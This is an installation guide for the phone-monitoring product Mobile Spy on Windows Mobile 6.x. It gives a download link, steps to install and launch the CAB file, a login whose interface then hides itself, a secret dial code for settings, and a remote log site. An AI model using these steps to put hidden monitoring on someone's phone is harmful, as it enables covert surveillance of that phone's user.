Installation Sub-Guide for Windows Mobile 6.x Devices

You should create your username before completing the installation steps. For more information on creating your username, see the User Guide. After you have created your username, follow each section below to install to your Windows Mobile 6.x smartphone.

Note: If your phone runs Windows Mobile 5.0 or 2003SE you should use the Windows Mobile 5 / 2003SE installation steps instead. The steps below are for Windows Mobile 6.x only.

IMPORTANT NOTE: This version and these instructions are for Windows Mobile v6.x ONLY!

1. Completely remove any previous version using the manual removal instructions. If you have never installed before, then go to step 2.

2. On your PC, click this link and save the file to your PC:   
http://www.mobile-spy.com/dls/wm6-203.CAB

3. Connect your phone to your PC using the USB cable. Windows Mobile Device Center might open on your PC. If so, click to "Connect to phone without changing settings."

4. On your PC, go to Start > Computer (or My Computer in XP). Navigate to the location on your PC where you saved the .CAB file. Right-click the .CAB file and click COPY.

5. Navigate to your device in your Folder list on the left. Go to the My Documents folder on your Device. Right-click in the file area and go to PASTE. The file should appear.

6. On your phone, go to Start > Applications > File Explorer. Navigate to the My Documents folder.

7. Highlight the wm6-203.CAB file and select it to install. Follow the screens to install.

8. Now you can delete the wm6-203.CAB file from the My Documents folder.

9. Still in File Explorer on the phone, navigate to this folder: My Device\Program Files\Smartphone

10. Select the file "Smartphone" to execute the program. You won't need to do this again later.

11. Enter your username and password in the fields and click "Login". The interface will automatically hide.

12. REBOOT YOUR PHONE!

You are now ready to monitor using Mobile Spy. To check logs, go to this specific login page to login: http://www.mobilespylogs.com.

You can bring up the interface to change settings by dialing #123456789* (Then hit SEND as you would to dial a regular number).
